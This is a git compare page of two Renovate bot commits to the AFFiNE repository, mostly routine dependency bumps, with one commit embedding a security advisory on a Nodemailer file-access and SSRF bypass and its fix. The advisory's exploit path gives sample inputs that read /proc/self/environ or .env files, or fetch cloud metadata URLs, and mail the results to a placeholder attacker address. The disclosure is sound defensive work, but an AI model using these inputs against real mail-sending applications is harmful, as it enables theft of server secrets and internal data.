Compare commits

...

2 Commits

Author SHA1 Message Date
renovate[bot] aa876927e7 chore: bump up all non-major npm dependencies 2026-06-20 03:40:28 +00:00
renovate[bot] 7ea8800c99 chore: bump up nodemailer version to v9 [SECURITY] (#15134)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [nodemailer](https://nodemailer.com/)
([source](https://redirect.github.com/nodemailer/nodemailer)) |
[`^8.0.11` →
`^9.0.0`](https://renovatebot.com/diffs/npm/nodemailer/8.0.11/9.0.1) |
![age](https://developer.mend.io/api/mc/badges/age/npm/nodemailer/9.0.1?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/nodemailer/8.0.11/9.0.1?slim=true)
|

---

### Nodemailer: Message-level raw option bypasses
disableFileAccess/disableUrlAccess, enabling arbitrary file read and
full-response SSRF in the delivered message

[GHSA-p6gq-j5cr-w38f](https://redirect.github.com/advisories/GHSA-p6gq-j5cr-w38f)

<details>
<summary>More information</summary>

#### Details
##### Message-level `raw` option bypasses `disableFileAccess` /
`disableUrlAccess`, enabling arbitrary file read and full-response SSRF
in the sent message

- **Target:** nodemailer/nodemailer, npm `nodemailer` **v9.0.0** (HEAD
`4e58450eb490e5097a74b2b2cce35a8d9e21856e`)
- **Verdict:** CONFIRMED (local PoC, no network)

##### Summary

Nodemailer exposes `disableFileAccess` and `disableUrlAccess` so an
application that passes
**untrusted** message data to the library can forbid that data from
reading local files or
fetching URLs. Every attachment, alternative,
`html`/`text`/`watchHtml`/`amp` and `icalEvent`
content node honors these flags. **The message-level `raw` option does
not.**

`MailComposer.compile()` builds the root MIME node for a `raw` message
**without** threading the
two flags, so a `raw: { path: '/etc/passwd' }` or `raw: { href:
'http://169.254.169.254/…' }`
message is read / fetched anyway, and the file or HTTP-response bytes
become the **actual
message that is sent** by every transport (SMTP, SES, sendmail, stream,
JSON). An actor whose
input the application intended to sandbox therefore obtains arbitrary
local-file disclosure and
a full-response SSRF primitive, delivered to a recipient the same actor
can choose.

This is the same vulnerability class as the already-published
jsonTransport advisory
**GHSA-wqvq-jvpq-h66f**, but a **distinct code path** (`raw` root node,
not `normalize()`), and
strictly higher impact: the jsonTransport bug only affected the
locally-returned JSON, whereas
this affects the delivered RFC822 message for all transports.

##### Affected component

- `lib/mail-composer/index.js:34-35` — root cause:
  ```js
  if (this.mail.raw) {
this.message = new MimeNode('message/rfc822', { newline:
this.mail.newline }).setRaw(this.mail.raw);
  }
  ```
The `MimeNode` is constructed with only `{ newline }`. Compare the
sibling node builders

`_createMixed`/`_createAlternative`/`_createRelated`/`_createContentNode`
  (`lib/mail-composer/index.js:389-527`), which all pass
`disableUrlAccess: this.mail.disableUrlAccess, disableFileAccess:
this.mail.disableFileAccess`.
- `lib/mime-node/index.js:51-52` — the constructor derives
`this.disableFileAccess`/
`this.disableUrlAccess` solely from its own `options`; children do
**not** inherit a parent's
flags (`createChild`/`appendChild`, lines 175-194, pass options through
verbatim).
- `lib/mime-node/index.js:812` — `setRaw()` content is resolved through
`this._getStream(this._raw)`.
- `lib/mime-node/index.js:984-1010` — `_getStream` reads the file
(`fs.createReadStream`, 995) or
fetches the URL (`nmfetch`, 1009) **only guarded by
`this.disableFileAccess`/`this.disableUrlAccess`**,
  which on the `raw` root node are `false`.
- Reached from the normal send flow at `lib/mailer/index.js:188`
(`mail.message = new MailComposer(mail.data).compile()`), so every
transport is affected.

##### Reachability gate (hop-by-hop)

1. **Source.** Application calls `transporter.sendMail({ raw:
<userControlled> , to: <userControlled> })`
with `disableFileAccess: true` and/or `disableUrlAccess: true`
configured on the transporter
(forced onto `mail.data` in `lib/mailer/mail-message.js:36-40`) or per
message. This is the
exact scenario the flags exist for — the same precondition under which
GHSA-wqvq-jvpq-h66f was
   accepted.
2. **Guard — the access flags.** For attachments the flag is enforced: a
node created by
`_createContentNode` carries `disableFileAccess`, so `_getStream` throws
`EFILEACCESS`.
**Bypass:** the `raw` branch (`compile():34-35`) never sets the flag on
its node, so
`this.disableFileAccess === false` and the guard at `mime-node:985` /
`:999` is skipped.
There is no other validation between `mail.raw` and the read; `raw`
content shapes
(`{path}`, `{href}`, stream, string, buffer) are accepted as-is by
`setRaw`/`_getStream`.
3. **Sink.** `fs.createReadStream(content.path)` (file disclosure) or
`nmfetch(content.href, …)` (SSRF). The resulting bytes are emitted as
the message body by
   `createReadStream()`, which every transport pipes to its destination
(`smtp-transport:233`, `smtp-pool/pool-resource:208`,
`ses-transport:96`, `sendmail-transport:184`,
   `stream-transport:67`).

No guard blocks the chain; the only guard (the access flags) is
structurally absent on this node.

##### Root cause

Inconsistent enforcement: the access policy is applied per-`MimeNode`
via constructor options and
must be re-passed at every node creation. The `raw`-message shortcut in
`compile()` omits it,
while all five other node builders include it. The flags are therefore
enforced for every content
type *except* the one that lets the caller supply a complete message
body by path/URL.

##### Exploit path

Application that sandboxes untrusted mail input
(`disableFileAccess`/`disableUrlAccess` set):

1. Untrusted actor supplies `raw: { path: '/proc/self/environ' }` (or
any server file:
   `/app/.env`, key material, etc.) and `to: attacker@evil.test`.
2. `compile()` builds the raw root node without the flags; the transport
reads the file and sends
its contents as the message → **arbitrary server-file exfiltration to an
attacker-chosen mailbox.**
3. Alternatively `raw: { href: 'http://127.0.0.1:8080/admin' }` or a
cloud metadata URL →
Nodemailer fetches it server-side and delivers the full response body in
the email →
   **full-response SSRF** (no blind-channel limitation).

##### Impact

- **Confidentiality (High):** arbitrary local file read disclosed in the
outgoing message;
full-response SSRF to internal/metadata endpoints, also disclosed in the
message.
- **Integrity (Low):** attacker-fetched/file content is injected into
the delivered mail.
- The two protective flags an application relies on to contain untrusted
input are silently
  ineffective for `raw`.

##### Preconditions

The application (a) passes `disableFileAccess` and/or `disableUrlAccess`
(the documented sandboxing
flags) and (b) lets untrusted input influence the `raw` field (and, for
maximal disclosure, `to`).
No other configuration is required; all bundled transports are affected.
This mirrors the accepted
precondition of GHSA-wqvq-jvpq-h66f.

##### Severity

- **AV** — message data routinely originates over the network in the
apps these flags protect.
- **AC** — a single crafted `raw` object; deterministic.
- **PR** — the actor is a user whose input the app already treats as
untrusted (the reason the
  flags are set); not fully anonymous in the typical deployment.
- **UI** — no victim interaction.
- **S** — impact within Nodemailer's process scope.
- **C** — arbitrary file read **and** full-response SSRF, both delivered
to an attacker-chosen
recipient. (The sibling jsonTransport advisory used C:L because its leak
stayed in locally-returned
JSON; here the bytes leave the system in the sent message, so C:H is
warranted.)
- **I** — attacker injects fetched/file bytes into the outgoing message.
- **A**.
Note: if a deployment fixes the recipient (`to` not attacker-controlled)
the disclosure channel
narrows and the rating degrades toward the sibling's Medium; the High
rating reflects the
reasonable worst case where `raw` and `to` are both untrusted.

##### Adversarial re-read (attempts to refute)

1. **"`raw` content is by-design trusted, so the flags shouldn't
apply."** Rejected: every other
content path (attachments, alternatives, html/text, icalEvent) honors
the flags, and the
maintainer already accepted GHSA-wqvq-jvpq-h66f for exactly this
"untrusted input + flag set"
model. The asymmetry — attachment `{path}` is blocked but `raw:{path}`
is not — is the bug, and
the PoC's CONTROL case proves the flag is otherwise effective on the
same file.
2. **"The raw node inherits the flags via rootNode."** Rejected by code
and by PoC: `compile():35`
constructs the node with `{ newline }` only; `MimeNode` constructor sets
`this.disableFileAccess = !!options.disableFileAccess` → `false`;
`rootNode` is itself; no
   inheritance exists.
3. **"The PoC leaks for an unrelated reason."** Rejected: the CONTROL
message (`attachments:[{path}]`,
same file, same transporter) returns `EFILEACCESS`; only the
`raw:{path}` message leaks. The
sentinel nonce exists solely in the temp file; the URL nonce is
generated server-side and is only
obtainable by an actual fetch. Both observables are uniquely bound to
the bypass.
4. **"Maybe only jsonTransport (already reported) is affected."**
Rejected: the PoC uses
`streamTransport` and the root cause is in `MailComposer.compile()`
(`mailer:188`), shared by all
   transports; jsonTransport is a different (already-fixed) path.

I could not find any guard that blocks the chain; the finding survives.

##### Proof of concept (safe, benign)

`findings/nodemailer/raw/poc-raw-fileaccess-bypass.js` — local, no
network egress (loopback only),
no destructive action. Output:
```
[CONTROL] attachment path with disableFileAccess: BLOCKED (EFILEACCESS) — flag works here
[ATTACK]  raw:{path} with disableFileAccess=true: BYPASSED — sentinel file CONTENT present in message
[ATTACK]  raw:{href} with disableUrlAccess=true (loopback server): BYPASSED — fetched body present (SSRF)
VERDICT: CONFIRMED
```
Run: `node findings/nodemailer/raw/poc-raw-fileaccess-bypass.js` (exit 0
= confirmed).

##### Remediation

Thread the access policy onto the `raw` root node, exactly as the other
builders do:
```js
if (this.mail.raw) {
    this.message = new MimeNode('message/rfc822', {
        newline: this.mail.newline,
        disableFileAccess: this.mail.disableFileAccess,
        disableUrlAccess: this.mail.disableUrlAccess
    }).setRaw(this.mail.raw);
}
```
(Defense in depth: `setRaw`/`_getStream` could also refuse
`{path}`/`{href}` raw content when either
flag is set, regardless of how the node was constructed.) Add a
regression test asserting that
`raw:{path}` and `raw:{href}` reject with `EFILEACCESS`/`EURLACCESS`
when the flags are set, mirroring
the attachment tests.

#### Severity
- CVSS Score: 7.1 / 10 (High)
- Vector String: `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N`

#### References
-
[https://github.com/nodemailer/nodemailer/security/advisories/GHSA-p6gq-j5cr-w38f](https://redirect.github.com/nodemailer/nodemailer/security/advisories/GHSA-p6gq-j5cr-w38f)
-
[https://github.com/advisories/GHSA-p6gq-j5cr-w38f](https://redirect.github.com/advisories/GHSA-p6gq-j5cr-w38f)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-p6gq-j5cr-w38f)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>nodemailer/nodemailer (nodemailer)</summary>

###
[`v9.0.1`](https://redirect.github.com/nodemailer/nodemailer/blob/HEAD/CHANGELOG.md#901-2026-06-17)

[Compare
Source](https://redirect.github.com/nodemailer/nodemailer/compare/v9.0.0...v9.0.1)

##### Bug Fixes

- enforce disableFileAccess/disableUrlAccess for raw message option
([a82e060](https://redirect.github.com/nodemailer/nodemailer/commit/a82e060d978f27e5f41369a9a9807b1e3dedc2e2))

###
[`v9.0.0`](https://redirect.github.com/nodemailer/nodemailer/blob/HEAD/CHANGELOG.md#900-2026-06-14)

[Compare
Source](https://redirect.github.com/nodemailer/nodemailer/compare/v8.0.11...v9.0.0)

##### ⚠ BREAKING CHANGES

- HTTPS requests made while fetching remote content (attachment
href/path URLs, OAuth2 token endpoints, HTTP/HTTPS proxy CONNECT) now
validate the server's TLS certificate by default. Requests to hosts with
self-signed, expired, or hostname-mismatched certificates that
previously succeeded will now fail. Opt back out per request with
tls.rejectUnauthorized=false (transport options, or a per-attachment
`tls` option).

##### Bug Fixes

- replace deprecated url.parse with a WHATWG URL wrapper
([0c080fb](https://redirect.github.com/nodemailer/nodemailer/commit/0c080fbf3278926f013a5c2ad06f5f6f0e18f5ed))
- validate TLS certificates by default when fetching remote content
([6a947ac](https://redirect.github.com/nodemailer/nodemailer/commit/6a947ac7114a16da1e6a50d9a6f4e17026ce145d))

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMzEuMSIsInVwZGF0ZWRJblZlciI6IjQzLjIzMS4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-06-19 22:51:23 +08:00
35 changed files with 6556 additions and 6916 deletions
+1 -1
View File
@@ -1,4 +1,4 @@
# syntax=docker/dockerfile:1.7
# syntax=docker/dockerfile:1.25
FROM node:22-bookworm-slim AS assets
WORKDIR /app
+1 -1
View File
@@ -182,7 +182,7 @@ jobs:
run: yarn workspace @affine/android cap sync
- uses: actions/setup-python@v6
with:
python-version: '3.13'
python-version: '3.14'
- name: Auth gcloud
id: auth
uses: google-github-actions/auth@v2
-940
View File
File diff suppressed because one or more lines are too long
+944
View File
File diff suppressed because one or more lines are too long
+1 -1
View File
@@ -12,4 +12,4 @@ npmPublishAccess: public
npmRegistryServer: "https://registry.npmjs.org"
yarnPath: .yarn/releases/yarn-4.13.0.cjs
yarnPath: .yarn/releases/yarn-4.17.0.cjs
Generated
+1359 -812
View File
File diff suppressed because it is too large Load Diff
+25 -25
View File
@@ -28,15 +28,15 @@ resolver = "3"
chrono = "0.4"
clap = { version = "4.4", features = ["derive"] }
core-foundation = "0.10"
coreaudio-rs = "0.12"
cpal = "0.15"
criterion = { version = "0.5", features = ["html_reports"] }
coreaudio-rs = "0.14"
cpal = "0.18"
criterion = { version = "0.8", features = ["html_reports"] }
criterion2 = { version = "3", default-features = false }
crossbeam-channel = "0.5"
dispatch2 = "0.3"
doc_extractor = "0.1.0"
dotenvy = "0.15"
file-format = { version = "0.28", features = ["reader"] }
file-format = { version = "0.29", features = ["reader"] }
hex = "0.4"
homedir = "0.3"
image = { version = "0.25.9", default-features = false, features = [
@@ -55,13 +55,13 @@ resolver = "3"
llm_adapter = { version = "0.2", default-features = false }
llm_runtime = { version = "0.2", default-features = false }
log = "0.4"
lru = "0.16"
lru = "0.18"
matroska = "0.30"
memory-indexer = "0.3.1"
mermaid-rs-renderer = { git = "https://github.com/toeverything/mermaid-rs-renderer", rev = "fba9097", default-features = false }
mimalloc = "0.1"
mp4parse = "0.17"
nanoid = "0.4"
nanoid = "0.5"
napi = { version = "3.7.0", features = [
"async",
"chrono_date",
@@ -80,48 +80,48 @@ resolver = "3"
ordered-float = "5"
p256 = { version = "0.13", features = ["ecdsa", "pem"] }
parking_lot = "0.12"
phf = { version = "0.11", features = ["macros"] }
phf = { version = "0.13", features = ["macros"] }
proptest = "1.3"
proptest-derive = "0.5"
proptest-derive = "0.8"
pulldown-cmark = "0.13"
rand = "0.9"
rand_chacha = "0.9"
rand_distr = "0.5"
rand = "0.10"
rand_chacha = "0.10"
rand_distr = "0.6"
rayon = "1.10"
regex = "1.10"
rubato = "0.16"
safefetch = "0.1.0"
schemars = "0.8"
screencapturekit = "0.3"
schemars = "0.9"
screencapturekit = "0.4"
serde = "1"
serde_json = "1"
sha2 = "0.10"
sha3 = "0.10"
sha2 = "0.11"
sha3 = "0.12"
smol_str = "0.3"
sqlx = { version = "0.8", default-features = false, features = [
sqlx = { version = "0.9", default-features = false, features = [
"chrono",
"macros",
"migrate",
"runtime-tokio",
"sqlite",
] }
symphonia = { version = "0.5", features = ["all", "opt-simd"] }
symphonia = { version = "0.6", features = ["all", "opt-simd"] }
thiserror = "2"
tiktoken-rs = "0.7"
tiktoken-rs = "0.12"
tokio = "1.45"
typst = "0.14.2"
typst = "0.15.0"
typst-as-lib = { version = "0.15.4", default-features = false, features = [
"packages",
"typst-kit-embed-fonts",
"typst-kit-fonts",
"ureq",
] }
typst-svg = "0.14.2"
uniffi = "0.29"
typst-svg = "0.15.0"
uniffi = "0.31"
url = { version = "2.5" }
uuid = "1.8"
v_htmlescape = "0.15"
windows = { version = "0.61", features = [
v_htmlescape = "0.17"
windows = { version = "0.62", features = [
"Win32_Devices_FunctionDiscovery",
"Win32_Foundation",
"Win32_Media_Audio",
@@ -133,10 +133,10 @@ resolver = "3"
"Win32_System_Variant",
"Win32_UI_Shell_PropertiesSystem",
] }
windows-core = { version = "0.61" }
windows-core = { version = "0.62" }
y-octo = "0.0.3"
y-sync = { version = "0.4" }
yrs = "0.23.0"
yrs = "0.27.0"
[profile.dev.package.sqlx-macros]
opt-level = 3
@@ -30,7 +30,7 @@
},
"devDependencies": {
"@vitest/browser-playwright": "^4.1.8",
"playwright": "=1.58.2",
"playwright": "=1.61.0",
"vitest": "^4.1.8"
},
"exports": {
+1 -1
View File
@@ -22,7 +22,7 @@
"@blocksuite/store": "workspace:*",
"@floating-ui/dom": "^1.6.13",
"@preact/signals-core": "^1.8.0",
"katex": "^0.16.27",
"katex": "^0.17.0",
"lit": "^3.2.0",
"remark-math": "^6.0.0"
},
@@ -26,7 +26,7 @@
},
"devDependencies": {
"@vitest/browser-playwright": "^4.1.8",
"playwright": "=1.58.2",
"playwright": "=1.61.0",
"vitest": "^4.1.8"
},
"exports": {
+1 -1
View File
@@ -20,7 +20,7 @@
"@blocksuite/std": "workspace:*",
"@blocksuite/store": "workspace:*",
"@preact/signals-core": "^1.8.0",
"katex": "^0.16.27",
"katex": "^0.17.0",
"lit": "^3.2.0",
"remark-math": "^6.0.0",
"shiki": "^3.19.0",
+2 -2
View File
@@ -38,7 +38,7 @@
"micromark-extension-gfm-table": "^2.1.0",
"micromark-extension-gfm-task-list-item": "^2.1.0",
"micromark-util-combine-extensions": "^2.0.0",
"pdfmake": "^0.2.20",
"pdfmake": "^0.3.0",
"quick-lru": "^7.3.0",
"rehype-parse": "^9.0.0",
"rehype-stringify": "^10.0.0",
@@ -73,7 +73,7 @@
"!dist/__tests__"
],
"devDependencies": {
"@types/pdfmake": "^0.2.12",
"@types/pdfmake": "^0.3.0",
"vitest": "^4.1.8"
},
"version": "0.26.3"
+1 -1
View File
@@ -34,7 +34,7 @@
},
"devDependencies": {
"@vitest/browser-playwright": "^4.1.8",
"playwright": "=1.58.2",
"playwright": "=1.61.0",
"vitest": "^4.1.8"
},
"exports": {
+1 -1
View File
@@ -36,7 +36,7 @@
"devDependencies": {
"@vanilla-extract/vite-plugin": "^5.0.0",
"@vitest/browser-playwright": "^4.1.8",
"playwright": "=1.58.2",
"playwright": "=1.61.0",
"vite": "^7.3.5",
"vite-plugin-wasm": "^3.5.0",
"vitest": "^4.1.8"
+1 -1
View File
@@ -19,7 +19,7 @@
"@shoelace-style/shoelace": "2.20.1",
"@toeverything/pdf-viewer": "^0.1.1",
"@toeverything/pdfium": "^0.1.1",
"katex": "^0.16.27",
"katex": "^0.17.0",
"lit": "^3.2.0",
"lz-string": "^1.5.0",
"rxjs": "^7.8.2",
+3 -3
View File
@@ -56,7 +56,7 @@
"@faker-js/faker": "^10.1.0",
"@istanbuljs/schema": "^0.1.3",
"@magic-works/i18n-codegen": "^0.6.1",
"@playwright/test": "=1.58.2",
"@playwright/test": "=1.61.0",
"@smarttools/eslint-plugin-rxjs": "^1.0.8",
"@taplo/cli": "^0.7.0",
"@toeverything/infra": "workspace:*",
@@ -74,7 +74,7 @@
"eslint-import-resolver-typescript": "^4.4.4",
"eslint-plugin-import-x": "^4.16.1",
"eslint-plugin-lit": "^2.2.1",
"eslint-plugin-oxlint": "1.68.0",
"eslint-plugin-oxlint": "1.70.0",
"eslint-plugin-react": "^7.37.5",
"eslint-plugin-react-hooks": "^7.0.1",
"eslint-plugin-simple-import-sort": "^12.1.1",
@@ -93,7 +93,7 @@
"vite": "^7.3.5",
"vitest": "^4.1.8"
},
"packageManager": "yarn@4.13.0",
"packageManager": "yarn@4.17.0",
"resolutions": {
"array-buffer-byte-length": "npm:@nolyfill/array-buffer-byte-length@^1",
"array-includes": "npm:@nolyfill/array-includes@^1",
+1 -1
View File
@@ -32,7 +32,7 @@
"build:debug": "napi build"
},
"devDependencies": {
"@napi-rs/cli": "3.5.0",
"@napi-rs/cli": "3.7.2",
"tiktoken": "^1.0.17"
}
}
+3 -3
View File
@@ -82,7 +82,7 @@
"graphql-scalars": "^1.24.0",
"graphql-upload": "^17.0.0",
"html-validate": "^9.0.0",
"htmlrewriter": "^0.0.12",
"htmlrewriter": "^0.0.13",
"http-errors": "^2.0.0",
"ioredis": "^5.11.1",
"is-mobile": "^5.0.0",
@@ -93,12 +93,12 @@
"nanoid": "^5.1.6",
"nest-winston": "^1.9.7",
"nestjs-cls": "^6.0.0",
"nodemailer": "^8.0.11",
"nodemailer": "^9.0.0",
"on-headers": "^1.1.0",
"piscina": "^5.1.4",
"prisma": "^6.6.0",
"react": "^19.2.1",
"react-dom": "19.2.1",
"react-dom": "19.2.7",
"reflect-metadata": "^0.2.2",
"rxjs": "^7.8.2",
"semver": "^7.7.4",
+1 -1
View File
@@ -44,7 +44,7 @@
"embla-carousel-react": "^8.5.1",
"input-otp": "^1.4.1",
"lodash-es": "^4.17.23",
"lucide-react": "^0.508.0",
"lucide-react": "^0.577.0",
"next-themes": "^0.4.4",
"react": "^19.2.1",
"react-day-picker": "^9.4.3",
@@ -9,7 +9,7 @@ buildscript {
mavenCentral()
}
dependencies {
classpath 'com.android.tools.build:gradle:8.10.0'
classpath 'com.android.tools.build:gradle:8.13.2'
}
}
@@ -1,44 +1,44 @@
[versions]
android-gradle-plugin = "8.10.0"
androidx-activity-compose = "1.10.1"
androidx-appcompat = "1.7.0"
androidx-browser = "1.8.0"
androidx-compose-bom = "2025.05.00"
android-gradle-plugin = "8.13.2"
androidx-activity-compose = "1.13.0"
androidx-appcompat = "1.7.1"
androidx-browser = "1.10.0"
androidx-compose-bom = "2025.12.01"
androidx-coordinatorlayout = "1.3.0"
androidx-core-ktx = "1.16.0"
androidx-core-splashscreen = "1.0.1"
androidx-datastore-preferences = "1.2.0-alpha02"
androidx-espresso-core = "3.6.1"
androidx-junit = "1.2.1"
androidx-lifecycle-compose = "2.9.0"
androidx-core-ktx = "1.19.0"
androidx-core-splashscreen = "1.2.0"
androidx-datastore-preferences = "1.2.1"
androidx-espresso-core = "3.7.0"
androidx-junit = "1.3.0"
androidx-lifecycle-compose = "2.11.0"
androidx-material3 = "1.3.1"
androidx-navigation = "2.9.0"
apollo = "4.4.2"
apollo-kotlin-adapters = "0.0.6"
androidx-navigation = "2.9.8"
apollo = "4.4.3"
apollo-kotlin-adapters = "0.7.0"
# @keep
compileSdk = "36"
firebase-bom = "33.13.0"
firebase-crashlytics = "3.0.3"
google-services = "4.4.2"
gradle-versions = "0.52.0"
hilt = "2.56.2"
hilt-ext = "1.2.0"
jna = "5.17.0"
firebase-bom = "33.16.0"
firebase-crashlytics = "3.0.7"
google-services = "4.5.0"
gradle-versions = "0.54.0"
hilt = "2.59.2"
hilt-ext = "1.3.0"
jna = "5.19.1"
junit = "4.13.2"
kotlin = "2.1.20"
kotlinx-coroutines = "1.10.2"
kotlinx-datetime = "0.6.2"
kotlinx-serialization-json = "1.8.1"
ksp = "2.1.20-2.0.1"
kotlin = "2.4.0"
kotlinx-coroutines = "1.11.0"
kotlinx-datetime = "0.8.0-0.6.x-compat"
kotlinx-serialization-json = "1.11.0"
ksp = "2.3.9"
# @keep
minSdk = "23"
mozilla-rust-android = "0.9.6"
okhttp-bom = "5.0.0-alpha.14"
richtext = "1.0.0-alpha02"
okhttp-bom = "5.4.0"
richtext = "1.0.0-alpha05"
# @keep
targetSdk = "35"
timber = "5.0.1"
version-catalog-update = "1.0.0"
version-catalog-update = "1.1.0"
[libraries]
android-gradle-plugin = { module = "com.android.tools.build:gradle", version.ref = "android-gradle-plugin" }
@@ -1,6 +1,6 @@
distributionBase=GRADLE_USER_HOME
distributionPath=wrapper/dists
distributionUrl=https\://services.gradle.org/distributions/gradle-8.14-all.zip
distributionUrl=https\://services.gradle.org/distributions/gradle-8.14.5-all.zip
networkTimeout=10000
validateDistributionUrl=true
zipStoreBase=GRADLE_USER_HOME
+1 -1
View File
@@ -21,7 +21,7 @@ end
target 'AFFiNE' do
capacitor_pods
# Add your Pods here
pod 'CryptoSwift', '~> 1.8.3'
pod 'CryptoSwift', '~> 1.10.0'
end
post_install do |installer|
+2 -2
View File
@@ -51,7 +51,7 @@
"clsx": "^2.1.1",
"dayjs": "^1.11.13",
"emojibase-data": "^16.0.3",
"foxact": "^0.2.49",
"foxact": "^0.3.0",
"jotai": "^2.10.3",
"lit": "^3.2.1",
"lodash-es": "^4.17.23",
@@ -60,7 +60,7 @@
"nanoid": "^5.1.6",
"next-themes": "^0.4.4",
"react": "^19.2.1",
"react-dom": "19.2.1",
"react-dom": "19.2.7",
"react-paginate": "^8.3.0",
"react-router-dom": "^6.30.4",
"react-transition-state": "^2.2.0",
+4 -4
View File
@@ -60,7 +60,7 @@
"eventemitter2": "^6.4.9",
"file-type": "^21.0.0",
"filesize": "^10.1.6",
"foxact": "^0.2.49",
"foxact": "^0.3.0",
"fuse.js": "^7.0.0",
"graphemer": "^1.4.0",
"graphql": "^16.9.0",
@@ -69,8 +69,8 @@
"image-blob-reduce": "^4.1.0",
"is-svg": "^6.1.0",
"jotai": "^2.10.3",
"jotai-scope": "^0.7.2",
"katex": "^0.16.27",
"jotai-scope": "^0.11.0",
"katex": "^0.17.0",
"lit": "^3.2.1",
"lodash-es": "^4.17.23",
"lottie-react": "^2.4.0",
@@ -98,7 +98,7 @@
},
"devDependencies": {
"@blocksuite/affine-ext-loader": "workspace:*",
"@playwright/test": "=1.58.2",
"@playwright/test": "=1.61.0",
"@testing-library/dom": "^10.4.0",
"@testing-library/react": "^16.1.0",
"@types/bytes": "^3.1.5",
+1 -1
View File
@@ -25,7 +25,7 @@
]
},
"devDependencies": {
"@napi-rs/cli": "3.5.0",
"@napi-rs/cli": "3.7.2",
"@napi-rs/whisper": "^0.0.4",
"@types/node": "^22.0.0",
"ava": "^7.0.0",
+1 -1
View File
@@ -7,7 +7,7 @@
},
"devDependencies": {
"@affine-test/kit": "workspace:*",
"@playwright/test": "=1.58.2"
"@playwright/test": "=1.61.0"
},
"version": "0.26.3"
}
+1 -1
View File
@@ -7,7 +7,7 @@
},
"devDependencies": {
"@affine-test/kit": "workspace:*",
"@playwright/test": "=1.58.2"
"@playwright/test": "=1.61.0"
},
"version": "0.26.3"
}
+1 -1
View File
@@ -7,7 +7,7 @@
},
"devDependencies": {
"@affine-test/kit": "workspace:*",
"@playwright/test": "=1.58.2"
"@playwright/test": "=1.61.0"
},
"version": "0.26.3"
}
+2 -2
View File
@@ -8,10 +8,10 @@
"devDependencies": {
"@affine-test/kit": "workspace:*",
"@affine/electron-api": "workspace:*",
"@playwright/test": "=1.58.2",
"@playwright/test": "=1.61.0",
"@types/fs-extra": "^11.0.4",
"fs-extra": "^11.2.0",
"playwright": "=1.58.2"
"playwright": "=1.61.0"
},
"version": "0.26.3"
}
+1 -1
View File
@@ -7,7 +7,7 @@
},
"devDependencies": {
"@affine-test/kit": "workspace:*",
"@playwright/test": "=1.58.2"
"@playwright/test": "=1.61.0"
},
"version": "0.26.3"
}
+1 -1
View File
@@ -7,7 +7,7 @@
},
"devDependencies": {
"@affine-test/kit": "workspace:*",
"@playwright/test": "=1.58.2"
"@playwright/test": "=1.61.0"
},
"version": "0.26.3"
}
+1 -1
View File
@@ -9,7 +9,7 @@
"@affine-test/kit": "workspace:*",
"@blocksuite/affine": "workspace:*",
"@blocksuite/integration-test": "workspace:*",
"@playwright/test": "=1.58.2",
"@playwright/test": "=1.61.0",
"@toeverything/theme": "^1.1.23",
"json-stable-stringify": "^1.2.1"
},
+1 -1
View File
@@ -14,7 +14,7 @@
"@affine-tools/utils": "workspace:*",
"@blocksuite/affine": "workspace:*",
"@node-rs/argon2": "^2.0.2",
"@playwright/test": "=1.58.2",
"@playwright/test": "=1.61.0",
"@toeverything/infra": "workspace:*",
"express": "^5.1.0",
"http-proxy-middleware": "^3.0.5"
+4160 -5071
View File
File diff suppressed because it is too large Load Diff